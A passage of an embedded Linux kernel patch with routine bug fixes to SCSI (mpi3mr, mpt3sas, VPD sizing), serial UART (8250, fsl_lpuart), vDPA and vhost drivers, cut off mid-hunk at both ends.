+ void pci_bus_remove_resources(struct pci_bus *bus)
+ {
+ 	int i;
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 8e34bbf44d1f5..2bf8612fa55dd 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -341,9 +341,6 @@ static void scsi_host_dev_release(struct device *dev)
+ 	struct Scsi_Host *shost = dev_to_shost(dev);
+ 	struct device *parent = dev->parent;
+ 
+-	/* In case scsi_remove_host() has not been called. */
+-	scsi_proc_hostdir_rm(shost->hostt);
+-
+ 	/* Wait for functions invoked through call_rcu(&scmd->rcu, ...) */
+ 	rcu_barrier();
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr.h b/drivers/scsi/mpi3mr/mpi3mr.h
+index 8a438f248a820..de6914d57402c 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr.h
++++ b/drivers/scsi/mpi3mr/mpi3mr.h
+@@ -903,6 +903,7 @@ struct scmd_priv {
+  * @admin_reply_ephase:Admin reply queue expected phase
+  * @admin_reply_base: Admin reply queue base virtual address
+  * @admin_reply_dma: Admin reply queue base dma address
++ * @admin_reply_q_in_use: Queue is handled by poll/ISR
+  * @ready_timeout: Controller ready timeout
+  * @intr_info: Interrupt cookie pointer
+  * @intr_info_count: Number of interrupt cookies
+@@ -1056,6 +1057,7 @@ struct mpi3mr_ioc {
+ 	u8 admin_reply_ephase;
+ 	void *admin_reply_base;
+ 	dma_addr_t admin_reply_dma;
++	atomic_t admin_reply_q_in_use;
+ 
+ 	u32 ready_timeout;
+ 
+@@ -1391,4 +1393,7 @@ void mpi3mr_add_event_wait_for_device_refresh(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_flush_drv_cmds(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_flush_cmds_for_unrecovered_controller(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_free_enclosure_list(struct mpi3mr_ioc *mrioc);
++int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc);
++void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
++	struct mpi3mr_sas_node *sas_expander);
+ #endif /*MPI3MR_H_INCLUDED*/
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 758f7ca9e0ee8..28fd90c4b62d0 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -415,7 +415,7 @@ out:
+ 		    le64_to_cpu(scsi_reply->sense_data_buffer_address));
+ }
+ 
+-static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
++int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ {
+ 	u32 exp_phase = mrioc->admin_reply_ephase;
+ 	u32 admin_reply_ci = mrioc->admin_reply_ci;
+@@ -423,12 +423,17 @@ static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ 	u64 reply_dma = 0;
+ 	struct mpi3_default_reply_descriptor *reply_desc;
+ 
++	if (!atomic_add_unless(&mrioc->admin_reply_q_in_use, 1, 1))
++		return 0;
++
+ 	reply_desc = (struct mpi3_default_reply_descriptor *)mrioc->admin_reply_base +
+ 	    admin_reply_ci;
+ 
+ 	if ((le16_to_cpu(reply_desc->reply_flags) &
+-	    MPI3_REPLY_DESCRIPT_FLAGS_PHASE_MASK) != exp_phase)
++	    MPI3_REPLY_DESCRIPT_FLAGS_PHASE_MASK) != exp_phase) {
++		atomic_dec(&mrioc->admin_reply_q_in_use);
+ 		return 0;
++	}
+ 
+ 	do {
+ 		if (mrioc->unrecoverable)
+@@ -454,6 +459,7 @@ static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ 	writel(admin_reply_ci, &mrioc->sysif_regs->admin_reply_queue_ci);
+ 	mrioc->admin_reply_ci = admin_reply_ci;
+ 	mrioc->admin_reply_ephase = exp_phase;
++	atomic_dec(&mrioc->admin_reply_q_in_use);
+ 
+ 	return num_admin_replies;
+ }
+@@ -2605,6 +2611,7 @@ static int mpi3mr_setup_admin_qpair(struct mpi3mr_ioc *mrioc)
+ 	mrioc->admin_reply_ci = 0;
+ 	mrioc->admin_reply_ephase = 1;
+ 	mrioc->admin_reply_base = NULL;
++	atomic_set(&mrioc->admin_reply_q_in_use, 0);
+ 
+ 	if (!mrioc->admin_req_base) {
+ 		mrioc->admin_req_base = dma_alloc_coherent(&mrioc->pdev->dev,
+@@ -3813,27 +3820,34 @@ retry_init:
+ 
+ 	mpi3mr_print_ioc_info(mrioc);
+ 
+-	dprint_init(mrioc, "allocating config page buffers\n");
+-	mrioc->cfg_page = dma_alloc_coherent(&mrioc->pdev->dev,
+-	    MPI3MR_DEFAULT_CFG_PAGE_SZ, &mrioc->cfg_page_dma, GFP_KERNEL);
+-	if (!mrioc->cfg_page)
+-		goto out_failed_noretry;
+-
+-	mrioc->cfg_page_sz = MPI3MR_DEFAULT_CFG_PAGE_SZ;
++	if (!mrioc->cfg_page) {
++		dprint_init(mrioc, "allocating config page buffers\n");
++		mrioc->cfg_page_sz = MPI3MR_DEFAULT_CFG_PAGE_SZ;
++		mrioc->cfg_page = dma_alloc_coherent(&mrioc->pdev->dev,
++		    mrioc->cfg_page_sz, &mrioc->cfg_page_dma, GFP_KERNEL);
++		if (!mrioc->cfg_page) {
++			retval = -1;
++			goto out_failed_noretry;
++		}
++	}
+ 
+-	retval = mpi3mr_alloc_reply_sense_bufs(mrioc);
+-	if (retval) {
+-		ioc_err(mrioc,
+-		    "%s :Failed to allocated reply sense buffers %d\n",
+-		    __func__, retval);
+-		goto out_failed_noretry;
++	if (!mrioc->init_cmds.reply) {
++		retval = mpi3mr_alloc_reply_sense_bufs(mrioc);
++		if (retval) {
++			ioc_err(mrioc,
++			    "%s :Failed to allocated reply sense buffers %d\n",
++			    __func__, retval);
++			goto out_failed_noretry;
++		}
+ 	}
+ 
+-	retval = mpi3mr_alloc_chain_bufs(mrioc);
+-	if (retval) {
+-		ioc_err(mrioc, "Failed to allocated chain buffers %d\n",
+-		    retval);
+-		goto out_failed_noretry;
++	if (!mrioc->chain_sgl_list) {
++		retval = mpi3mr_alloc_chain_bufs(mrioc);
++		if (retval) {
++			ioc_err(mrioc, "Failed to allocated chain buffers %d\n",
++			    retval);
++			goto out_failed_noretry;
++		}
+ 	}
+ 
+ 	retval = mpi3mr_issue_iocinit(mrioc);
+@@ -3879,8 +3893,10 @@ retry_init:
+ 		dprint_init(mrioc, "allocating memory for throttle groups\n");
+ 		sz = sizeof(struct mpi3mr_throttle_group_info);
+ 		mrioc->throttle_groups = kcalloc(mrioc->num_io_throttle_group, sz, GFP_KERNEL);
+-		if (!mrioc->throttle_groups)
++		if (!mrioc->throttle_groups) {
++			retval = -1;
+ 			goto out_failed_noretry;
++		}
+ 	}
+ 
+ 	retval = mpi3mr_enable_events(mrioc);
+@@ -3900,6 +3916,7 @@ out_failed:
+ 		mpi3mr_memset_buffers(mrioc);
+ 		goto retry_init;
+ 	}
++	retval = -1;
+ out_failed_noretry:
+ 	ioc_err(mrioc, "controller initialization failed\n");
+ 	mpi3mr_issue_reset(mrioc, MPI3_SYSIF_HOST_DIAG_RESET_ACTION_DIAG_FAULT,
+@@ -4012,6 +4029,7 @@ retry_init:
+ 		ioc_err(mrioc,
+ 		    "cannot create minimum number of operational queues expected:%d created:%d\n",
+ 		    mrioc->shost->nr_hw_queues, mrioc->num_op_reply_q);
++		retval = -1;
+ 		goto out_failed_noretry;
+ 	}
+ 
+@@ -4078,6 +4096,7 @@ out_failed:
+ 		mpi3mr_memset_buffers(mrioc);
+ 		goto retry_init;
+ 	}
++	retval = -1;
+ out_failed_noretry:
+ 	ioc_err(mrioc, "controller %s is failed\n",
+ 	    (is_resume)?"resume":"re-initialization");
+@@ -4155,6 +4174,7 @@ void mpi3mr_memset_buffers(struct mpi3mr_ioc *mrioc)
+ 		memset(mrioc->admin_req_base, 0, mrioc->admin_req_q_sz);
+ 	if (mrioc->admin_reply_base)
+ 		memset(mrioc->admin_reply_base, 0, mrioc->admin_reply_q_sz);
++	atomic_set(&mrioc->admin_reply_q_in_use, 0);
+ 
+ 	if (mrioc->init_cmds.reply) {
+ 		memset(mrioc->init_cmds.reply, 0, sizeof(*mrioc->init_cmds.reply));
+@@ -4350,13 +4370,20 @@ void mpi3mr_free_mem(struct mpi3mr_ioc *mrioc)
+ 		    mrioc->admin_req_base, mrioc->admin_req_dma);
+ 		mrioc->admin_req_base = NULL;
+ 	}
+-
++	if (mrioc->cfg_page) {
++		dma_free_coherent(&mrioc->pdev->dev, mrioc->cfg_page_sz,
++		    mrioc->cfg_page, mrioc->cfg_page_dma);
++		mrioc->cfg_page = NULL;
++	}
+ 	if (mrioc->pel_seqnum_virt) {
+ 		dma_free_coherent(&mrioc->pdev->dev, mrioc->pel_seqnum_sz,
+ 		    mrioc->pel_seqnum_virt, mrioc->pel_seqnum_dma);
+ 		mrioc->pel_seqnum_virt = NULL;
+ 	}
+ 
++	kfree(mrioc->throttle_groups);
++	mrioc->throttle_groups = NULL;
++
+ 	kfree(mrioc->logdata_buf);
+ 	mrioc->logdata_buf = NULL;
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 6eaeba41072cb..6d55698ea4d16 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -3720,6 +3720,7 @@ int mpi3mr_issue_tm(struct mpi3mr_ioc *mrioc, u8 tm_type,
+ 		mpi3mr_poll_pend_io_completions(mrioc);
+ 		mpi3mr_ioc_enable_intr(mrioc);
+ 		mpi3mr_poll_pend_io_completions(mrioc);
++		mpi3mr_process_admin_reply_q(mrioc);
+ 	}
+ 	switch (tm_type) {
+ 	case MPI3_SCSITASKMGMT_TASKTYPE_TARGET_RESET:
+@@ -5077,6 +5078,8 @@ static void mpi3mr_remove(struct pci_dev *pdev)
+ 	struct workqueue_struct	*wq;
+ 	unsigned long flags;
+ 	struct mpi3mr_tgt_dev *tgtdev, *tgtdev_next;
++	struct mpi3mr_hba_port *port, *hba_port_next;
++	struct mpi3mr_sas_node *sas_expander, *sas_expander_next;
+ 
+ 	if (!shost)
+ 		return;
+@@ -5116,6 +5119,28 @@ static void mpi3mr_remove(struct pci_dev *pdev)
+ 	mpi3mr_free_mem(mrioc);
+ 	mpi3mr_cleanup_resources(mrioc);
+ 
++	spin_lock_irqsave(&mrioc->sas_node_lock, flags);
++	list_for_each_entry_safe_reverse(sas_expander, sas_expander_next,
++	    &mrioc->sas_expander_list, list) {
++		spin_unlock_irqrestore(&mrioc->sas_node_lock, flags);
++		mpi3mr_expander_node_remove(mrioc, sas_expander);
++		spin_lock_irqsave(&mrioc->sas_node_lock, flags);
++	}
++	list_for_each_entry_safe(port, hba_port_next, &mrioc->hba_port_table_list, list) {
++		ioc_info(mrioc,
++		    "removing hba_port entry: %p port: %d from hba_port list\n",
++		    port, port->port_id);
++		list_del(&port->list);
++		kfree(port);
++	}
++	spin_unlock_irqrestore(&mrioc->sas_node_lock, flags);
++
++	if (mrioc->sas_hba.num_phys) {
++		kfree(mrioc->sas_hba.phy);
++		mrioc->sas_hba.phy = NULL;
++		mrioc->sas_hba.num_phys = 0;
++	}
++
+ 	spin_lock(&mrioc_list_lock);
+ 	list_del(&mrioc->list);
+ 	spin_unlock(&mrioc_list_lock);
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 3b61815979dab..50263ba4f8428 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -9,9 +9,6 @@
+ 
+ #include "mpi3mr.h"
+ 
+-static void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
+-	struct mpi3mr_sas_node *sas_expander);
+-
+ /**
+  * mpi3mr_post_transport_req - Issue transport requests and wait
+  * @mrioc: Adapter instance reference
+@@ -2163,7 +2160,7 @@ out_fail:
+  *
+  * Return nothing.
+  */
+-static void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
++void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
+ 	struct mpi3mr_sas_node *sas_expander)
+ {
+ 	struct mpi3mr_sas_port *mr_sas_port, *next;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_transport.c b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+index e5ecd6ada6cdd..e8a4750f6ec47 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_transport.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+@@ -785,7 +785,7 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 		goto out_fail;
+ 	}
+ 	port = sas_port_alloc_num(sas_node->parent_dev);
+-	if ((sas_port_add(port))) {
++	if (!port || (sas_port_add(port))) {
+ 		ioc_err(ioc, "failure at %s:%d/%s()!\n",
+ 			__FILE__, __LINE__, __func__);
+ 		goto out_fail;
+@@ -824,6 +824,12 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 			    mpt3sas_port->remote_identify.sas_address;
+ 	}
+ 
++	if (!rphy) {
++		ioc_err(ioc, "failure at %s:%d/%s()!\n",
++			__FILE__, __LINE__, __func__);
++		goto out_delete_port;
++	}
++
+ 	rphy->identify = mpt3sas_port->remote_identify;
+ 
+ 	if ((sas_rphy_add(rphy))) {
+@@ -831,6 +837,7 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 			__FILE__, __LINE__, __func__);
+ 		sas_rphy_free(rphy);
+ 		rphy = NULL;
++		goto out_delete_port;
+ 	}
+ 
+ 	if (mpt3sas_port->remote_identify.device_type == SAS_END_DEVICE) {
+@@ -857,7 +864,10 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 		    rphy_to_expander_device(rphy), hba_port->port_id);
+ 	return mpt3sas_port;
+ 
+- out_fail:
++out_delete_port:
++	sas_port_delete(port);
++
++out_fail:
+ 	list_for_each_entry_safe(mpt3sas_phy, next, &mpt3sas_port->phy_list,
+ 	    port_siblings)
+ 		list_del(&mpt3sas_phy->port_siblings);
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index 9feb0323bc44a..dff1d692e756a 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -326,6 +326,9 @@ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
+ 	unsigned char vpd_header[SCSI_VPD_HEADER_SIZE] __aligned(4);
+ 	int result;
+ 
++	if (sdev->no_vpd_size)
++		return SCSI_DEFAULT_VPD_LEN;
++
+ 	/*
+ 	 * Fetch the VPD page header to find out how big the page
+ 	 * is. This is done to prevent problems on legacy devices
+diff --git a/drivers/scsi/scsi_devinfo.c b/drivers/scsi/scsi_devinfo.c
+index c7080454aea99..bc9d280417f6a 100644
+--- a/drivers/scsi/scsi_devinfo.c
++++ b/drivers/scsi/scsi_devinfo.c
+@@ -134,7 +134,7 @@ static struct {
+ 	{"3PARdata", "VV", NULL, BLIST_REPORTLUN2},
+ 	{"ADAPTEC", "AACRAID", NULL, BLIST_FORCELUN},
+ 	{"ADAPTEC", "Adaptec 5400S", NULL, BLIST_FORCELUN},
+-	{"AIX", "VDASD", NULL, BLIST_TRY_VPD_PAGES},
++	{"AIX", "VDASD", NULL, BLIST_TRY_VPD_PAGES | BLIST_NO_VPD_SIZE},
+ 	{"AFT PRO", "-IX CF", "0.0>", BLIST_FORCELUN},
+ 	{"BELKIN", "USB 2 HS-CF", "1.95",  BLIST_FORCELUN | BLIST_INQUIRY_36},
+ 	{"BROWNIE", "1200U3P", NULL, BLIST_NOREPORTLUN},
+@@ -188,6 +188,7 @@ static struct {
+ 	{"HPE", "OPEN-", "*", BLIST_REPORTLUN2 | BLIST_TRY_VPD_PAGES},
+ 	{"IBM", "AuSaV1S2", NULL, BLIST_FORCELUN},
+ 	{"IBM", "ProFibre 4000R", "*", BLIST_SPARSELUN | BLIST_LARGELUN},
++	{"IBM", "2076", NULL, BLIST_NO_VPD_SIZE},
+ 	{"IBM", "2105", NULL, BLIST_RETRY_HWERROR},
+ 	{"iomega", "jaz 1GB", "J.86", BLIST_NOTQ | BLIST_NOLUN},
+ 	{"IOMEGA", "ZIP", NULL, BLIST_NOTQ | BLIST_NOLUN},
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index f9b18fdc7b3c8..6042a5587bc37 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1055,6 +1055,9 @@ static int scsi_add_lun(struct scsi_device *sdev, unsigned char *inq_result,
+ 	else if (*bflags & BLIST_SKIP_VPD_PAGES)
+ 		sdev->skip_vpd_pages = 1;
+ 
++	if (*bflags & BLIST_NO_VPD_SIZE)
++		sdev->no_vpd_size = 1;
++
+ 	transport_configure_device(&sdev->sdev_gendev);
+ 
+ 	if (sdev->host->hostt->slave_configure) {
+diff --git a/drivers/tty/serial/8250/8250_em.c b/drivers/tty/serial/8250/8250_em.c
+index f8e99995eee91..d94c3811a8f7a 100644
+--- a/drivers/tty/serial/8250/8250_em.c
++++ b/drivers/tty/serial/8250/8250_em.c
+@@ -106,8 +106,8 @@ static int serial8250_em_probe(struct platform_device *pdev)
+ 	memset(&up, 0, sizeof(up));
+ 	up.port.mapbase = regs->start;
+ 	up.port.irq = irq;
+-	up.port.type = PORT_UNKNOWN;
+-	up.port.flags = UPF_BOOT_AUTOCONF | UPF_FIXED_PORT | UPF_IOREMAP;
++	up.port.type = PORT_16750;
++	up.port.flags = UPF_FIXED_PORT | UPF_IOREMAP | UPF_FIXED_TYPE;
+ 	up.port.dev = &pdev->dev;
+ 	up.port.private_data = priv;
+ 
+diff --git a/drivers/tty/serial/8250/8250_fsl.c b/drivers/tty/serial/8250/8250_fsl.c
+index 8aad15622a2e5..8adfaa183f778 100644
+--- a/drivers/tty/serial/8250/8250_fsl.c
++++ b/drivers/tty/serial/8250/8250_fsl.c
+@@ -34,7 +34,7 @@ int fsl8250_handle_irq(struct uart_port *port)
+ 
+ 	iir = port->serial_in(port, UART_IIR);
+ 	if (iir & UART_IIR_NO_INT) {
+-		spin_unlock(&up->port.lock);
++		spin_unlock_irqrestore(&up->port.lock, flags);
+ 		return 0;
+ 	}
+ 
+@@ -42,7 +42,7 @@ int fsl8250_handle_irq(struct uart_port *port)
+ 	if (unlikely(up->lsr_saved_flags & UART_LSR_BI)) {
+ 		up->lsr_saved_flags &= ~UART_LSR_BI;
+ 		port->serial_in(port, UART_RX);
+-		spin_unlock(&up->port.lock);
++		spin_unlock_irqrestore(&up->port.lock, flags);
+ 		return 1;
+ 	}
+ 
+diff --git a/drivers/tty/serial/8250/Kconfig b/drivers/tty/serial/8250/Kconfig
+index b0f62345bc846..583a340f99345 100644
+--- a/drivers/tty/serial/8250/Kconfig
++++ b/drivers/tty/serial/8250/Kconfig
+@@ -253,8 +253,9 @@ config SERIAL_8250_ASPEED_VUART
+ 	tristate "Aspeed Virtual UART"
+ 	depends on SERIAL_8250
+ 	depends on OF
+-	depends on REGMAP && MFD_SYSCON
++	depends on MFD_SYSCON
+ 	depends on ARCH_ASPEED || COMPILE_TEST
++	select REGMAP
+ 	help
+ 	  If you want to use the virtual UART (VUART) device on Aspeed
+ 	  BMC platforms, enable this option. This enables the 16550A-
+diff --git a/drivers/tty/serial/Kconfig b/drivers/tty/serial/Kconfig
+index c55b947f3cdbb..8cbf73f86059a 100644
+--- a/drivers/tty/serial/Kconfig
++++ b/drivers/tty/serial/Kconfig
+@@ -1313,7 +1313,7 @@ config SERIAL_FSL_LPUART
+ 
+ config SERIAL_FSL_LPUART_CONSOLE
+ 	bool "Console on Freescale lpuart serial port"
+-	depends on SERIAL_FSL_LPUART
++	depends on SERIAL_FSL_LPUART=y
+ 	select SERIAL_CORE_CONSOLE
+ 	select SERIAL_EARLYCON
+ 	help
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index b136c596fe6ae..812216b24db81 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1328,6 +1328,7 @@ static void lpuart_dma_rx_free(struct uart_port *port)
+ 	struct dma_chan *chan = sport->dma_rx_chan;
+ 
+ 	dmaengine_terminate_sync(chan);
++	del_timer_sync(&sport->lpuart_timer);
+ 	dma_unmap_sg(chan->device->dev, &sport->rx_sgl, 1, DMA_FROM_DEVICE);
+ 	kfree(sport->rx_ring.buf);
+ 	sport->rx_ring.tail = 0;
+@@ -1762,7 +1763,6 @@ static int lpuart32_startup(struct uart_port *port)
+ static void lpuart_dma_shutdown(struct lpuart_port *sport)
+ {
+ 	if (sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
+ 		lpuart_dma_rx_free(&sport->port);
+ 		sport->lpuart_dma_rx_use = false;
+ 	}
+@@ -1922,10 +1922,8 @@ lpuart_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	 * Since timer function acqures sport->port.lock, need to stop before
+ 	 * acquring same lock because otherwise del_timer_sync() can deadlock.
+ 	 */
+-	if (old && sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
++	if (old && sport->lpuart_dma_rx_use)
+ 		lpuart_dma_rx_free(&sport->port);
+-	}
+ 
+ 	spin_lock_irqsave(&sport->port.lock, flags);
+ 
+@@ -2159,10 +2157,8 @@ lpuart32_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	 * Since timer function acqures sport->port.lock, need to stop before
+ 	 * acquring same lock because otherwise del_timer_sync() can deadlock.
+ 	 */
+-	if (old && sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
++	if (old && sport->lpuart_dma_rx_use)
+ 		lpuart_dma_rx_free(&sport->port);
+-	}
+ 
+ 	spin_lock_irqsave(&sport->port.lock, flags);
+ 
+@@ -2189,9 +2185,15 @@ lpuart32_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	/* update the per-port timeout */
+ 	uart_update_timeout(port, termios->c_cflag, baud);
+ 
+-	/* wait transmit engin complete */
+-	lpuart32_write(&sport->port, 0, UARTMODIR);
+-	lpuart32_wait_bit_set(&sport->port, UARTSTAT, UARTSTAT_TC);
++	/*
++	 * LPUART Transmission Complete Flag may never be set while queuing a break
++	 * character, so skip waiting for transmission complete when UARTCTRL_SBK is
++	 * asserted.
++	 */
++	if (!(old_ctrl & UARTCTRL_SBK)) {
++		lpuart32_write(&sport->port, 0, UARTMODIR);
++		lpuart32_wait_bit_set(&sport->port, UARTSTAT, UARTSTAT_TC);
++	}
+ 
+ 	/* disable transmit and receive */
+ 	lpuart32_write(&sport->port, old_ctrl & ~(UARTCTRL_TE | UARTCTRL_RE),
+@@ -2962,7 +2964,6 @@ static int lpuart_suspend(struct device *dev)
+ 			 * cannot resume as expected, hence gracefully release the
+ 			 * Rx DMA path before suspend and start Rx DMA path on resume.
+ 			 */
+-			del_timer_sync(&sport->lpuart_timer);
+ 			lpuart_dma_rx_free(&sport->port);
+ 
+ 			/* Disable Rx DMA to use UART port as wakeup source */
+diff --git a/drivers/vdpa/mlx5/core/mlx5_vdpa.h b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+index 058fbe28107e9..25fc4120b618d 100644
+--- a/drivers/vdpa/mlx5/core/mlx5_vdpa.h
++++ b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+@@ -96,6 +96,7 @@ struct mlx5_vdpa_dev {
+ 	struct mlx5_control_vq cvq;
+ 	struct workqueue_struct *wq;
+ 	unsigned int group2asid[MLX5_VDPA_NUMVQ_GROUPS];
++	bool suspended;
+ };
+ 
+ int mlx5_vdpa_alloc_pd(struct mlx5_vdpa_dev *dev, u32 *pdn, u16 uid);
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index 3a6dbbc6440d4..daac3ab314785 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -2411,7 +2411,7 @@ static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev,
+ 	if (err)
+ 		goto err_mr;
+ 
+-	if (!(mvdev->status & VIRTIO_CONFIG_S_DRIVER_OK))
++	if (!(mvdev->status & VIRTIO_CONFIG_S_DRIVER_OK) || mvdev->suspended)
+ 		goto err_mr;
+ 
+ 	restore_channels_info(ndev);
+@@ -2579,6 +2579,7 @@ static int mlx5_vdpa_reset(struct vdpa_device *vdev)
+ 	clear_vqs_ready(ndev);
+ 	mlx5_vdpa_destroy_mr(&ndev->mvdev);
+ 	ndev->mvdev.status = 0;
++	ndev->mvdev.suspended = false;
+ 	ndev->cur_num_vqs = 0;
+ 	ndev->mvdev.cvq.received_desc = 0;
+ 	ndev->mvdev.cvq.completed_desc = 0;
+@@ -2815,6 +2816,8 @@ static int mlx5_vdpa_suspend(struct vdpa_device *vdev)
+ 	struct mlx5_vdpa_virtqueue *mvq;
+ 	int i;
+ 
++	mlx5_vdpa_info(mvdev, "suspending device\n");
++
+ 	down_write(&ndev->reslock);
+ 	ndev->nb_registered = false;
+ 	mlx5_notifier_unregister(mvdev->mdev, &ndev->nb);
+@@ -2824,6 +2827,7 @@ static int mlx5_vdpa_suspend(struct vdpa_device *vdev)
+ 		suspend_vq(ndev, mvq);
+ 	}
+ 	mlx5_vdpa_cvq_suspend(mvdev);
++	mvdev->suspended = true;
+ 	up_write(&ndev->reslock);
+ 	return 0;
+ }
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim.c b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+index cb88891b44a8c..61bde476cf9c8 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+@@ -66,6 +66,7 @@ static void vdpasim_vq_notify(struct vringh *vring)
+ static void vdpasim_queue_ready(struct vdpasim *vdpasim, unsigned int idx)
+ {
+ 	struct vdpasim_virtqueue *vq = &vdpasim->vqs[idx];
++	uint16_t last_avail_idx = vq->vring.last_avail_idx;
+ 
+ 	vringh_init_iotlb(&vq->vring, vdpasim->features, vq->num, false,
+ 			  (struct vring_desc *)(uintptr_t)vq->desc_addr,
+@@ -74,6 +75,18 @@ static void vdpasim_queue_ready(struct vdpasim *vdpasim, unsigned int idx)
+ 			  (struct vring_used *)
+ 			  (uintptr_t)vq->device_addr);
+ 
++	vq->vring.last_avail_idx = last_avail_idx;
++
++	/*
++	 * Since vdpa_sim does not support receive inflight descriptors as a
++	 * destination of a migration, let's set both avail_idx and used_idx
++	 * the same at vq start.  This is how vhost-user works in a
++	 * VHOST_SET_VRING_BASE call.
++	 *
++	 * Although the simple fix is to set last_used_idx at
++	 * vdpasim_set_vq_state, it would be reset at vdpasim_queue_ready.
++	 */
++	vq->vring.last_used_idx = last_avail_idx;
+ 	vq->vring.notify = vdpasim_vq_notify;
+ }
+ 
+diff --git a/drivers/vdpa/virtio_pci/vp_vdpa.c b/drivers/vdpa/virtio_pci/vp_vdpa.c
+index 8fe267ca3e76f..281287fae89f1 100644
+--- a/drivers/vdpa/virtio_pci/vp_vdpa.c
++++ b/drivers/vdpa/virtio_pci/vp_vdpa.c
+@@ -645,8 +645,8 @@ static void vp_vdpa_remove(struct pci_dev *pdev)
+ 	struct virtio_pci_modern_device *mdev = NULL;
+ 
+ 	mdev = vp_vdpa_mgtdev->mdev;
+-	vp_modern_remove(mdev);
+ 	vdpa_mgmtdev_unregister(&vp_vdpa_mgtdev->mgtdev);
++	vp_modern_remove(mdev);
+ 	kfree(vp_vdpa_mgtdev->mgtdev.id_table);
+ 	kfree(mdev);
+ 	kfree(vp_vdpa_mgtdev);
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index ec32f785dfdec..b7657984dd8df 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -1134,6 +1134,7 @@ static int vhost_vdpa_alloc_domain(struct vhost_vdpa *v)
+ 
+ err_attach:
+ 	iommu_domain_free(v->domain);
++	v->domain = NULL;
+ 	return ret;
+ }
+ 
+@@ -1178,6 +1179,7 @@ static void vhost_vdpa_cleanup(struct vhost_vdpa *v)
+ 			vhost_vdpa_remove_as(v, asid);
+ 	}
+ 
++	vhost_vdpa_free_domain(v);
+ 	vhost_dev_cleanup(&v->vdev);
+ 	kfree(v->vdev.vqs);
+ }
+@@ -1250,7 +1252,6 @@ static int vhost_vdpa_release(struct inode *inode, struct file *filep)
+ 	vhost_vdpa_clean_irq(v);
+ 	vhost_vdpa_reset(v);
+ 	vhost_dev_stop(&v->vdev);
+-	vhost_vdpa_free_domain(v);
+ 	vhost_vdpa_config_put(v);
+ 	vhost_vdpa_cleanup(v);
+ 	mutex_unlock(&d->mutex);
+diff --git a/drivers/video/fbdev/chipsfb.c b/drivers/video/fbdev/chipsfb.c
+index cc37ec3f8fc1f..7799d52a651f3 100644
+--- a/drivers/video/fbdev/chipsfb.c
++++ b/drivers/video/fbdev/chipsfb.c
+@@ -358,16 +358,21 @@ static int chipsfb_pci_init(struct pci_dev *dp, const struct pci_device_id *ent)
+ 	if (rc)
+ 		return rc;
+ 
+-	if (pci_enable_device(dp) < 0) {
